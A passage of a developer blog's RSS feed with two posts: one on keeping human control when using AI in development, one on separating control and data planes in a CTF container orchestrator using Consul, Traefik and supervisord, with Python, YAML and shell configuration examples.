<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Stack Unwind]]></title><description><![CDATA[Unfiltered CTF writeups and dev chronicles.Every misstep, dead end, and moment of profound confusion documented. Because the most valuable lessons emerge from h]]></description><link>https://blog.realrudrap.dev</link><generator>RSS for Node</generator><lastBuildDate>Sat, 11 Apr 2026 17:45:54 GMT</lastBuildDate><atom:link href="https://blog.realrudrap.dev/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[How I use AI in my Dev Workflow (without losing control)]]></title><description><![CDATA[While building Poseidon, a custom CTF focused container orchestrator and deploying OrcaCTF on AWS, Sumit asked how I incorporate AI into my development workflow. As I explained my process, I realized I’ve subconsciously developed a systematic framewo...]]></description><link>https://blog.realrudrap.dev/how-i-use-ai-in-my-dev-workflow-without-losing-control</link><guid isPermaLink="true">https://blog.realrudrap.dev/how-i-use-ai-in-my-dev-workflow-without-losing-control</guid><category><![CDATA[AI]]></category><category><![CDATA[software development]]></category><category><![CDATA[System Design]]></category><category><![CDATA[development workflow]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Fri, 28 Nov 2025 05:30:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1764136330152/1755247a-b91e-4ff4-8053-3fcf574f3445.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>While building Poseidon, a custom CTF focused container orchestrator and deploying OrcaCTF on AWS, <a target="_blank" href="https://www.linkedin.com/in/steosumit/">Sumit</a> asked how I incorporate AI into my 
development workflow. As I explained my process, I realized I’ve subconsciously developed a systematic framework which keeps me in control while making the most of AI’s strengths.</p>
<p>This post isn’t about prompt engineering or which model is best. It’s about having a methodology that lets AI accelerate your workflow without making you dependent on it or producing unmaintainable code.</p>
<h2 id="heading-my-4-phase-development-framework">My 4-phase development framework</h2>
<h3 id="heading-phase-1-solo-architecture-thinking-no-ai-yet">Phase 1: Solo Architecture Thinking ( No AI yet )</h3>
<p>Before touching any AI tool, I force a period of clean room thinking.</p>
<ul>
<li><p>Take time and think through the requirements</p>
</li>
<li><p>Research options using primary documentation</p>
</li>
<li><p>Outline a couple of architectural approaches</p>
</li>
<li><p>Document trade-offs for each architecture</p>
</li>
</ul>
<p>Example from Poseidon:</p>
<p>“Do I use AWS Lambda ( serverless, but 15 min execution limit ), Fargate ( managed containers, but complex per-container routing ) or build a custom orchestrator?”</p>
<p><strong>Why this matters:</strong> AI defaults to the "average" solution found in its training data. It lacks the specific context of your constraints (budget, timeline, team expertise). Only you can critically evaluate these trade-offs. Skipping this step leads to generic, sub-optimal architectures.</p>
<h3 id="heading-phase-2-architectural-validation-amp-refinement-enter-ai">Phase 2: Architectural Validation &amp; Refinement ( Enter AI )</h3>
<p>Once I have a satisfying outline, I treat the AI (Claude is my preference here) as a "Red Team" or a Critical Reviewer. The goal isn't "tell me how to build," but "tell me where this breaks."</p>
<p><strong>My validation checklist:</strong></p>
<ul>
<li><p><strong>Edge case detection:</strong> I am choosing X over Y because of Z. What failure modes am I not considering?</p>
</li>
<li><p><strong>Scale Analysis:</strong> Here’s my service mesh design. What breaks first at 10k concurrent users?</p>
</li>
<li><p><strong>Operational blindspots:</strong> I’m planning to use Consul for service discovery. What are the known operational headaches?</p>
<p>  <strong>The Goal:</strong> A theoretically stress-tested tech stack and infrastructure approach I am confident in, validated against patterns I might have missed.</p>
</li>
</ul>
<h3 id="heading-phase-3-top-down-code-skeleton-my-core-method">Phase 3: Top-down code skeleton ( my core method )</h3>
<p>This is where my approach diverges from “just start coding” or “ask AI to build it.”</p>
<p><strong>The Process:</strong></p>
<ol>
<li><p><strong>Define the high-level interface:</strong> Start at the highest level of abstraction using strict typing</p>
<pre><code class="lang-python"> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">request_instance</span>(<span class="hljs-params">user_id: str, challenge_id: str</span>) -&gt; Instance:</span>
     <span class="hljs-keyword">pass</span>
</code></pre>
</li>
<li><p><strong>Think through what this method needs:</strong></p>
<ul>
<li><p>Check user’s rate limits</p>
</li>
<li><p>Ensure there is no existing container associated with the user</p>
</li>
<li><p>Select the least loaded worker for deploying the container on</p>
</li>
<li><p>Register service to Consul</p>
</li>
<li><p>Save state to Redis</p>
</li>
<li><p>Set up routing to specific container</p>
</li>
<li><p>Return a well-defined Instance object</p>
</li>
</ul>
</li>
<li><p><strong>Create “contract” stubs:</strong></p>
<pre><code class="lang-python"> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">select_best_worker</span>() -&gt; WorkerNode:</span>
     <span class="hljs-keyword">return</span> WorkerNode(node_id = <span class="hljs-string">"stub"</span>, address = <span class="hljs-string">"stub"</span>)

 <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">request_spawn_container_on_worker</span>(<span class="hljs-params">
     worker : WorkerNode,
     challenge_image : str
 </span>) -&gt; Container:</span>
     <span class="hljs-keyword">return</span> Container(id=<span class="hljs-string">"stub"</span>,ip=<span class="hljs-string">"stub"</span>,port=<span class="hljs-number">8080</span>)

 <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">register_service_in_consul</span>(<span class="hljs-params">
     container: Container,
     user_request: RequestChallenge
 </span>) -&gt; bool:</span>
     <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>
</code></pre>
</li>
<li><p><strong>Go deeper recursively:</strong> Each stub function gets broken down recursively into its own sub-functions until I hit the system boundaries (external APIs like Docker SDK, Consul client, Redis, etc. )</p>
</li>
<li><p><strong>Return dummy data in the correct shape:</strong> This is critical. Each stub returns properly typed data so the top-level functions can “run” ( even if they do nothing real ).</p>
</li>
</ol>
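<p>Put together, the skeleton runs end-to-end on dummy data. Here’s a minimal, self-contained sketch of that idea (the names mirror the stubs above, but this is illustrative, not Poseidon’s actual code):</p>

```python
# Illustrative skeleton (not Poseidon's real code): every stub returns
# correctly shaped dummy data, so the top-level flow executes before any
# real infrastructure exists.
import asyncio
from dataclasses import dataclass


@dataclass
class WorkerNode:
    node_id: str
    address: str


@dataclass
class Container:
    id: str
    ip: str
    port: int


@dataclass
class Instance:
    id: str
    hostname: str


async def select_best_worker() -> WorkerNode:
    return WorkerNode(node_id="stub", address="stub")  # dummy, right shape


async def spawn_container(worker: WorkerNode, challenge_id: str) -> Container:
    return Container(id="stub", ip="stub", port=8080)  # dummy, right shape


async def request_instance(user_id: str, challenge_id: str) -> Instance:
    # The top-level flow is real; only the leaves are fake.
    worker = await select_best_worker()
    container = await spawn_container(worker, challenge_id)
    return Instance(id=container.id, hostname=f"{user_id}.example.local")


instance = asyncio.run(request_instance("u1", "chal-1"))
```

The whole call chain already “works”: you can step through it, log it, and verify the data flow before a single line of Docker or Consul code exists.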
<p><strong>Why this works:</strong></p>
<ul>
<li><p><strong>Control:</strong> I define the flow of execution and data structures.</p>
</li>
<li><p><strong>Isolation:</strong> Each function has a clear, single responsibility before implementation details muddy the waters.</p>
</li>
<li><p><strong>Debuggability:</strong> I can "run" the system with stubs to verify the logic flow before writing a single line of real infrastructure code.</p>
</li>
</ul>
<h3 id="heading-phase-4-bottom-up-implementation-ai-as-pair-programmer">Phase 4: Bottom-up implementation ( AI as pair programmer )</h3>
<p>With the interfaces defined, I switch to implementation. I work from the bottom up, starting with the functions that touch external APIs.</p>
<p>This is where AI shines. Since I have isolated the logic into a single stub, I can ask the AI to "Implement this specific function using the Docker SDK." The context is contained, preventing hallucinations. That said, it is still important to review all logic in the AI-generated code to prevent security compromises and to catch any hidden assumptions the AI might have made.</p>
<p><strong>What changes during implementation:</strong></p>
<p>After each sprint ( implementing a single layer ), the dummy return values in the top-level function are replaced with real data. The function signature usually stays the same, but I occasionally realize that I need additional data fields.</p>
<p><strong>Example:</strong></p>
<pre><code class="lang-python"><span class="hljs-comment"># Initial Stub</span>
<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">provision_instance</span>(<span class="hljs-params">challenge_id: str, user_id: str</span>) -&gt; Instance:</span>
    worker = <span class="hljs-keyword">await</span> select_best_worker()  <span class="hljs-comment"># Dummy at first</span>
    container = <span class="hljs-keyword">await</span> spawn_container(worker, challenge_id)  <span class="hljs-comment"># Dummy</span>
    <span class="hljs-keyword">await</span> register_service(container)  <span class="hljs-comment"># Dummy</span>
    <span class="hljs-keyword">return</span> Instance(id=<span class="hljs-string">"stub"</span>, hostname=<span class="hljs-string">"stub"</span>)  <span class="hljs-comment"># Dummy</span>

<span class="hljs-comment"># After implementing select_best_worker()</span>
<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">provision_instance</span>(<span class="hljs-params">challenge_id: str, user_id: str</span>) -&gt; Instance:</span>
    worker = <span class="hljs-keyword">await</span> select_best_worker()  <span class="hljs-comment"># Now returns real WorkerNode</span>
    container = <span class="hljs-keyword">await</span> spawn_container(worker, challenge_id)  <span class="hljs-comment"># Still dummy</span>
    <span class="hljs-keyword">await</span> register_service(container)  <span class="hljs-comment"># Still dummy</span>
    <span class="hljs-keyword">return</span> Instance(id=<span class="hljs-string">"stub"</span>, hostname=<span class="hljs-string">"stub"</span>, worker=worker)  <span class="hljs-comment"># Partially real</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1764148872568/c167776f-9030-4c84-85cc-ae3b44a0a246.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-the-challenge-data-shape-consistency">The Challenge: Data Shape Consistency</h2>
<p>A major risk in distributed systems is <strong>Schema Drift</strong>. In Poseidon, a "Worker" appears in multiple forms:</p>
<ol>
<li><p><strong>Redis:</strong> A JSON string.</p>
</li>
<li><p><strong>Internal Logic:</strong> A Python Object.</p>
</li>
<li><p><strong>API Response:</strong> A Pydantic model.</p>
</li>
<li><p><strong>gRPC:</strong> A Protobuf message.</p>
</li>
</ol>
<p>If you’re not careful, you end up with ad-hoc dictionaries <code>{"id": ...}</code> scattered everywhere. Debugging becomes a nightmare of key errors.</p>
<p><strong>My current solution:</strong> Explicit return type annotations everywhere.</p>
<pre><code class="lang-python"><span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">select_best_worker</span>() -&gt; WorkerNode:</span> <span class="hljs-comment"># forces me to return a WorkerNode</span>
    <span class="hljs-comment"># Can't accidentally return a dict or a string</span>
    ...
</code></pre>
<p>This doesn’t solve the problem entirely, but it forces me to think about data consistency upfront rather than during debugging.</p>
<p><strong>What I need to add:</strong></p>
<p><strong>Canonical Models &amp; Conversion Boundaries</strong></p>
<ol>
<li><p><strong>Canonical Form:</strong> A strict Pydantic model represents the entity within the application logic.</p>
</li>
<li><p><strong>Boundaries:</strong> Data is immediately converted to the Canonical Form when it enters the system (e.g., from Redis or API) and only converted out at the last moment.</p>
</li>
</ol>
<pre><code class="lang-python"><span class="hljs-comment"># The Canonical Model (The Truth)</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">WorkerNode</span>(<span class="hljs-params">BaseModel</span>):</span>
    node_id: str
    address: IPv4Address
    load: int

<span class="hljs-comment"># Boundary: Redis -&gt; Canonical</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_worker</span>(<span class="hljs-params">id: str</span>) -&gt; WorkerNode:</span>
    data = redis.get(id)
    <span class="hljs-keyword">return</span> WorkerNode(**json.loads(data)) <span class="hljs-comment"># Validation happens here</span>
</code></pre>
<p>This ensures that my AI-assisted implementation code never has to guess the shape of the data. It always receives and returns the Canonical Model.</p>
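<p>As a dependency-free illustration of the same boundary pattern (the post uses Pydantic; plain dataclasses stand in here), conversion happens exactly once at each edge:</p>

```python
# Boundary-conversion sketch using only the stdlib. Data entering from
# "Redis" becomes the canonical form immediately; it is serialized back to
# JSON only at the exit boundary. All logic in between sees one shape.
import json
from dataclasses import dataclass, asdict


@dataclass
class WorkerNode:
    node_id: str
    address: str
    load: int


def worker_from_redis(raw: str) -> WorkerNode:
    # Boundary in: raw JSON string -> canonical model.
    # A drifted or extra key raises TypeError here, not deep in routing code.
    return WorkerNode(**json.loads(raw))


def worker_to_redis(worker: WorkerNode) -> str:
    # Boundary out: canonical model -> JSON string for storage.
    return json.dumps(asdict(worker))


raw = '{"node_id": "w1", "address": "10.0.0.5", "load": 3}'
worker = worker_from_redis(raw)
```

Pydantic adds real type validation on top of this, but the discipline is the same: one canonical model, conversion only at the edges.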
<h2 id="heading-the-missing-piece-robust-testing">The Missing Piece: Robust Testing</h2>
<p>I’ll be honest: <strong>I don't write enough tests.</strong> Like many solo projects, I rely heavily on manual verification, which works until it doesn't.</p>
<p>However, the "Top-Down" framework actually lays the perfect groundwork for a testing strategy I <em>should</em> be implementing. Because the system is built on isolated stubs and contracts, the path to robustness is clear, even if I haven't walked it yet:</p>
<ul>
<li><p><strong>The Plan for Unit Tests:</strong> Since <code>select_best_worker()</code> is an isolated stub, I can easily write a test that forces it to raise a <code>NoResourcesAvailable</code> error to see if the parent function handles it gracefully.</p>
</li>
<li><p><strong>The Plan for Integration:</strong> I can mock the "System Boundary" functions (Docker/Consul) to test the orchestration logic without spinning up real infrastructure.</p>
</li>
</ul>
<p>Right now, I am testing manually. But because the architecture is decoupled, adding these tests later won't require a rewrite; just discipline.</p>
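<p>A sketch of what that first unit test could look like (names like <code>NoResourcesAvailable</code> are hypothetical, taken from the bullet above): because the selector is an isolated contract, injecting a failing version is trivial.</p>

```python
# Hypothetical unit-test sketch: swap the worker selector for one that
# raises, and check the parent function degrades gracefully.
import asyncio
from unittest.mock import AsyncMock


class NoResourcesAvailable(Exception):
    pass


async def select_best_worker() -> str:
    return "worker-1"  # stands in for the real implementation


async def provision(selector=select_best_worker) -> str:
    # Selector is injected so tests can replace it without monkeypatching.
    try:
        worker = await selector()
    except NoResourcesAvailable:
        return "error: no capacity"  # graceful handling under test
    return f"provisioned on {worker}"


# Happy path uses the default selector.
happy = asyncio.run(provision())

# Failure path: inject a selector that raises.
failing = AsyncMock(side_effect=NoResourcesAvailable())
sad = asyncio.run(provision(failing))
```
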
<h2 id="heading-why-this-framework-works">Why this Framework Works</h2>
<p><strong>Architectural Clarity:</strong> I understand the system because I designed it, not the AI.</p>
<p><strong>AI as accelerator, not crutch:</strong> AI fills in the implementation details, not the architectural decisions.</p>
<p><strong>Debuggability:</strong> Top-down structure + explicit types make it easier to trace failures.</p>
<p><strong>Incremental progress:</strong> Each sprint adds real functionality without breaking the overall structure.</p>
<h2 id="heading-when-this-doesnt-work"><strong>When this <em>doesn’t</em> work</strong></h2>
<p>This framework isn’t universal.</p>
<p>While this framework is excellent for architecting complex distributed systems, infrastructure, or anything with too many moving parts, it’s unnecessary for exploratory work.</p>
<p>When you’re simply trying to see whether an idea is viable, forcing a top-down process is self-inflicted pain. Build the crude prototype first; confirm the thing even deserves oxygen. Likewise, in well-trodden domains, this methodology adds little value. It wastes time that could be spent actually shipping something. You don’t need a grand design philosophy to churn out yet another CRUD app.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td></td><td><strong>Simple Domain</strong></td><td><strong>Complex Domain</strong></td></tr>
</thead>
<tbody>
<tr>
<td><strong>High Stakes</strong></td><td>Maybe overkill ( but safe )</td><td>Use the Framework</td></tr>
<tr>
<td><strong>Low Stakes ( Learning )</strong></td><td>Overkill; just hack it</td><td>Use the Framework ( learn deeply )</td></tr>
</tbody>
</table>
</div><p><strong>TLDR:</strong> If the cost of failure is high, plan the interface. If the cost of failure is low, just build it.</p>
<h2 id="heading-lessons-i-learnt">Lessons I learnt</h2>
<ol>
<li><p><strong>Start architectural conversations with AI, not direct implementation:</strong></p>
<ul>
<li><p>“I’m considering X vs Y for Z reason. What am I missing?”</p>
</li>
<li><p>Not: “Write me a container orchestrator”</p>
</li>
</ul>
</li>
<li><p><strong>Spend time designing the system before churning out actual code:</strong></p>
<ul>
<li><p>What are the 3-5 functions I need at the top level of abstraction?</p>
</li>
<li><p>What do they return and expect as parameters?</p>
</li>
<li><p>What do they need from each other?</p>
</li>
</ul>
</li>
<li><p><strong>Use type annotations religiously:</strong></p>
<ul>
<li><p>Forces consistent data shapes</p>
</li>
<li><p>Makes AI suggestions more accurate</p>
</li>
<li><p>Catches potential bugs at design time</p>
</li>
</ul>
</li>
<li><p><strong>Design top-down, implement bottom-up:</strong></p>
<ul>
<li><p>Start designing with your functions acting as providers and work your way down to the functions which consume other APIs</p>
</li>
<li><p>Implement functions talking to external APIs first and work your way up replacing stubs with real functions incrementally.</p>
</li>
</ul>
</li>
<li><p><strong>Review your data models before implementing:</strong></p>
<ul>
<li><p>How many ways are you representing the same entity?</p>
</li>
<li><p>Can you reduce it to one canonical form?</p>
</li>
</ul>
</li>
</ol>
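<p>On lessons 3 and 5, here’s a tiny runtime demonstration of why one canonical, typed form catches drift early (dataclasses for illustration; Pydantic would additionally validate field types):</p>

```python
# An ad-hoc dict with a drifted key fails loudly at construction time,
# instead of surfacing later as a KeyError deep inside routing logic.
from dataclasses import dataclass


@dataclass
class WorkerNode:
    node_id: str
    address: str


# Correctly shaped data constructs fine.
ok = WorkerNode(**{"node_id": "w1", "address": "10.0.0.5"})

# Drifted shape ("id" instead of "node_id") is rejected immediately.
try:
    WorkerNode(**{"id": "w1", "address": "10.0.0.5"})
    drift_caught = False
except TypeError:
    drift_caught = True
```
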
<h2 id="heading-conclusion">Conclusion</h2>
<p>AI is an incredible accelerator for building complex systems, but only if you stay in the driver's seat.</p>
<p>My framework keeps architectural decisions and system invariants in my control, while delegating the implementation details to the AI. The result is a system I can operate, debug, and evolve without guessing.</p>
<hr />
<p>Related: Building Poseidon <a target="_blank" href="https://hashnode.com/post/cmh8p84e9001902jr0l2id7iu">Part 1</a> | <a target="_blank" href="https://hashnode.com/post/cmhipb89k000802jl1yz0bhf5">Part 2</a> | <a target="_blank" href="https://hashnode.com/post/cmhspet0h000002ju1bbcckz4">Part 3</a></p>
]]></content:encoded></item><item><title><![CDATA[Building Poseidon #3: Control Plane vs Data Plane]]></title><description><![CDATA[In Part 2, I built the Master-Worker orchestration core: gRPC communication, container spawning and basic routing. It worked locally. Containers spun up, users got unique subdomains and traffic routed correctly.
Then I realized the architecture had a...]]></description><link>https://blog.realrudrap.dev/building-poseidon-3-control-plane-vs-data-plane</link><guid isPermaLink="true">https://blog.realrudrap.dev/building-poseidon-3-control-plane-vs-data-plane</guid><category><![CDATA[distributed system]]></category><category><![CDATA[Docker]]></category><category><![CDATA[Orchestration]]></category><category><![CDATA[CTF]]></category><category><![CDATA[software architecture]]></category><dc:creator><![CDATA[Rudra Ponkshe]]></dc:creator><pubDate>Mon, 10 Nov 2025 05:30:43 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762669817577/5d1608dc-d043-4f87-9d8f-756f6924beef.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://hashnode.com/post/cmhipb89k000802jl1yz0bhf5">Part 2</a>, I built the Master-Worker orchestration core: gRPC communication, container spawning and basic routing. It worked locally. Containers spun up, users got unique subdomains and traffic routed correctly.</p>
<p>Then I realized the architecture had a fundamental flaw.</p>
<h2 id="heading-the-problem-master-as-a-single-point-of-failure">The Problem: Master as a Single Point of Failure</h2>
<p>My initial design had centralized routing. The Master instance handled both orchestration ( deciding which worker runs a container ) and routing ( directing traffic to that container ). This created two problems:</p>
<p><strong>Problem 1: Availability</strong> If the Master crashed, users lost access to running containers, even though the containers were still alive on the Worker nodes. A control plane failure cut off access to the data plane.</p>
<p><strong>Problem 2: Scalability</strong> The Master became a routing bottleneck. All traffic flowed through it, limiting horizontal scaling. We could add more workers, but routing capacity stayed fixed.</p>
<p>This violates a core principle: <strong>separate the control plane from the data plane</strong>.</p>
<h2 id="heading-the-solution-service-mesh-with-consul-and-traefik">The Solution: Service Mesh with Consul and Traefik</h2>
<p>After reading Consul’s documentation and studying service mesh patterns, the solution was clear:</p>
<ul>
<li><p><strong>Master ( Control Plane ):</strong> Orchestrates the container lifecycle, maintains state in Redis, registers services in Consul</p>
</li>
<li><p><strong>Workers ( Data Plane ):</strong> Run containers, run Traefik instances, route traffic based on Consul’s service catalog</p>
</li>
<li><p><strong>Consul:</strong> Single source of truth for service discovery and routing metadata.</p>
</li>
</ul>
<p>The Master never touches production traffic. It just tells Consul, “container X is at IP Y on port Z with hostname H”. Every worker’s Traefik watches Consul and builds routing rules dynamically.</p>
<h2 id="heading-the-new-architecture">The New Architecture</h2>
<pre><code class="lang-plaintext">User Request (a3f4b92c8d.orcactf.app)
    ↓
DNS Resolution (will point to NLB on AWS)
    ↓
Any Worker's Traefik (via load balancer)
    ↓
Consul Lookup: "Which IP:port has this hostname?"
    ↓
Forward to Container (possibly on different worker)
    ↓
Container responds
</code></pre>
<p><strong>Key Insight:</strong> Any Traefik instance can route to any container, even if that container isn’t on the same worker. They all read from the same Consul Catalog.</p>
<p>This means:</p>
<ul>
<li><p>Master crash doesn’t affect routing.</p>
</li>
<li><p>Routing scales horizontally ( N workers = N Traefik instances )</p>
</li>
<li><p>Clear separation: Master orchestrates, Workers route</p>
</li>
<li><p>Adding a Worker adds both compute and network routing capacity</p>
</li>
</ul>
<h2 id="heading-implementation-service-registration-in-consul">Implementation: Service Registration in Consul</h2>
<p>When the Master provisions a container, it now registers the service in Consul instead of updating Traefik configs:</p>
<pre><code class="lang-python"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">CatalogManager</span>:</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span>(<span class="hljs-params">self, consul_host: str, consul_port: int</span>):</span>
        self.client = consul.aio.Consul(host=consul_host, port=consul_port)

    <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">register_route</span>(<span class="hljs-params">self, route_def: RouteDefinition, worker_node: WorkerNode</span>):</span>
        service_id = <span class="hljs-string">f"instance-<span class="hljs-subst">{route_def.instance_id}</span>"</span>
        protocol = route_def.protocol.value.lower()  <span class="hljs-comment"># 'http' or 'tcp'</span>

        tags = [
            <span class="hljs-string">"traefik.enable=true"</span>,
            <span class="hljs-string">f"traefik.<span class="hljs-subst">{protocol}</span>.routers.<span class="hljs-subst">{service_id}</span>.rule=Host(`<span class="hljs-subst">{route_def.hostname}</span>`)"</span>,
            <span class="hljs-string">f"traefik.<span class="hljs-subst">{protocol}</span>.routers.<span class="hljs-subst">{service_id}</span>.entrypoints=challenge-web"</span>,
            <span class="hljs-string">f"traefik.<span class="hljs-subst">{protocol}</span>.services.<span class="hljs-subst">{service_id}</span>.loadbalancer.server.port=<span class="hljs-subst">{route_def.backend_port}</span>"</span>
        ]

        <span class="hljs-keyword">await</span> self.client.agent.service.register(
            name=<span class="hljs-string">f"instance-svc-<span class="hljs-subst">{route_def.instance_id}</span>"</span>,
            service_id=service_id,
            address=route_def.backend_ip,  <span class="hljs-comment"># Container's internal IP</span>
            port=route_def.backend_port,
            tags=tags
        )
</code></pre>
<p><strong>What’s tagged here:</strong></p>
<ol>
<li><p><strong>Service ID:</strong> Unique identifier for this container instance</p>
</li>
<li><p><strong>Traefik Tags:</strong> Embedding routing rules that Traefik reads from Consul</p>
</li>
<li><p><strong>Address/Ports:</strong> Where the container is actually running ( internal Docker network IP )</p>
</li>
</ol>
<p>When a container terminates, we de-register:</p>
<pre><code class="lang-python"><span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">deregister_route</span>(<span class="hljs-params">self, instance_id: str</span>):</span>
    service_id = <span class="hljs-string">f"instance-<span class="hljs-subst">{instance_id}</span>"</span>
    <span class="hljs-keyword">await</span> self.client.agent.service.deregister(service_id)
</code></pre>
<p>Simple. The Master completes its job of writing to Consul and moves on.</p>
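<p>One refinement worth noting: the tag construction is a pure function of the route definition, so it can be pulled out and unit-tested without a live Consul (a sketch; the field names follow the snippet above):</p>

```python
# Pure helper that builds the Traefik routing tags for a container instance.
# Isolating it means the routing rules can be asserted in tests without
# touching the Consul agent at all.
def build_traefik_tags(instance_id: str, protocol: str,
                       hostname: str, backend_port: int) -> list:
    service_id = f"instance-{instance_id}"
    return [
        "traefik.enable=true",
        f"traefik.{protocol}.routers.{service_id}.rule=Host(`{hostname}`)",
        f"traefik.{protocol}.routers.{service_id}.entrypoints=challenge-web",
        f"traefik.{protocol}.services.{service_id}.loadbalancer.server.port={backend_port}",
    ]


tags = build_traefik_tags("abc123", "http", "a3f4b92c8d.orcactf.app", 8080)
```
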
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1762739605897/aad1df76-4824-488e-a00e-9c8da834274e.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-implementation-traefik-as-consul-catalog-consumer">Implementation: Traefik as Consul Catalog Consumer</h2>
<p>Each Worker runs a Traefik instance configured to watch Consul:</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># traefik.yml on each worker</span>

<span class="hljs-attr">log:</span>
  <span class="hljs-attr">level:</span> <span class="hljs-string">DEBUG</span>

<span class="hljs-attr">api:</span>
  <span class="hljs-attr">insecure:</span> <span class="hljs-literal">true</span> <span class="hljs-comment"># Only for local dev, will be changed in production</span>
  <span class="hljs-attr">dashboard:</span> <span class="hljs-literal">true</span> <span class="hljs-comment"># For debugging, will be disabled in production</span>

<span class="hljs-attr">entryPoints:</span>
  <span class="hljs-attr">traefik:</span>
    <span class="hljs-attr">address:</span> <span class="hljs-string">":8181"</span>  <span class="hljs-comment"># Dashboard</span>

  <span class="hljs-attr">challenge-tcp:</span>
    <span class="hljs-attr">address:</span> <span class="hljs-string">":2222"</span>  <span class="hljs-comment"># For SSH/TCP challenges</span>

  <span class="hljs-attr">challenge-web:</span>
    <span class="hljs-attr">address:</span> <span class="hljs-string">":8080"</span>  <span class="hljs-comment"># For HTTP challenges</span>

<span class="hljs-attr">providers:</span>
  <span class="hljs-attr">consulCatalog:</span>
    <span class="hljs-attr">endpoint:</span>
      <span class="hljs-attr">address:</span> <span class="hljs-string">"127.0.0.1:8500"</span>
      <span class="hljs-attr">scheme:</span> <span class="hljs-string">"http"</span>

    <span class="hljs-comment"># Only services tagged with traefik.enable=true</span>
    <span class="hljs-attr">constraints:</span> <span class="hljs-string">"Tag(`traefik.enable=true`)"</span>

    <span class="hljs-comment"># Don't auto-expose everything in Consul</span>
    <span class="hljs-attr">exposedByDefault:</span> <span class="hljs-literal">false</span>

    <span class="hljs-comment"># Look for tags prefixed with 'traefik'</span>
    <span class="hljs-attr">prefix:</span> <span class="hljs-string">"traefik"</span>
</code></pre>
<p>Traefik polls Consul every few seconds, discovers services with <code>traefik.enable=true</code>, reads their tags, and dynamically generates routing rules.</p>
<p><strong>No config files to update. No restarts required. Pure service discovery.</strong></p>
<h2 id="heading-the-worker-bootstrap-process">The Worker Bootstrap Process</h2>
<p>Each Worker needs to run three processes: Consul agent, Traefik, and the gRPC worker server. We use <code>supervisord</code> to manage them:</p>
<pre><code class="lang-ini"><span class="hljs-section">[supervisord]</span>
<span class="hljs-attr">nodaemon</span>=<span class="hljs-literal">true</span>

<span class="hljs-section">[program:consul]</span>
<span class="hljs-attr">command</span>=consul agent -node-id=%%INSTANCE_ID%% \
  <span class="hljs-attr">-data-dir</span>=/consul/data \
  <span class="hljs-attr">-config-dir</span>=/consul/config \
  <span class="hljs-attr">-retry-join</span>=<span class="hljs-string">"consul"</span> \
  <span class="hljs-attr">-client</span>=<span class="hljs-string">"0.0.0.0"</span> \
  <span class="hljs-attr">-enable-local-script-checks</span>=<span class="hljs-literal">true</span>
<span class="hljs-attr">autostart</span>=<span class="hljs-literal">true</span>
<span class="hljs-attr">autorestart</span>=<span class="hljs-literal">true</span>

<span class="hljs-section">[program:traefik]</span>
<span class="hljs-attr">command</span>=traefik --configfile=/etc/traefik/traefik.yml
<span class="hljs-attr">autostart</span>=<span class="hljs-literal">true</span>
<span class="hljs-attr">autorestart</span>=<span class="hljs-literal">true</span>

<span class="hljs-section">[program:poseidon-worker]</span>
<span class="hljs-attr">command</span>=python -m src.main
<span class="hljs-attr">autostart</span>=<span class="hljs-literal">true</span>
<span class="hljs-attr">autorestart</span>=<span class="hljs-literal">true</span>
</code></pre>
<p>The entrypoint script generates a unique worker ID ( locally for now, will use instance ID when used on AWS ) and starts all three processes:</p>
<pre><code class="lang-bash"><span class="hljs-meta">#!/bin/sh</span>
<span class="hljs-built_in">set</span> -e

INSTANCE_ID=$(uuidgen)
<span class="hljs-built_in">echo</span> <span class="hljs-string">"Worker node identified as: <span class="hljs-variable">${INSTANCE_ID}</span>"</span>

<span class="hljs-comment"># Template substitution for configs</span>
sed <span class="hljs-string">"s/%%INSTANCE_ID%%/<span class="hljs-variable">${INSTANCE_ID}</span>/g"</span> \
  /etc/supervisor/conf.d/supervisord.conf.template &gt; /tmp/supervisord.conf

sed <span class="hljs-string">"s/%%INSTANCE_ID%%/<span class="hljs-variable">${INSTANCE_ID}</span>/g"</span> \
  /consul/config/worker-service.json.template &gt; /consul/config/worker-service.json

<span class="hljs-built_in">exec</span> /usr/bin/supervisord -c /tmp/supervisord.conf
</code></pre>
<p>Each Worker joins the Consul cluster, registers a health check, and starts accepting gRPC requests from the Master.</p>
<h2 id="heading-what-broke-the-traefik-tag-nightmare">What Broke: The Traefik Tag Nightmare</h2>
<p>This all sounds clean in retrospect. In practice, getting Traefik to generate routes correctly took hours.</p>
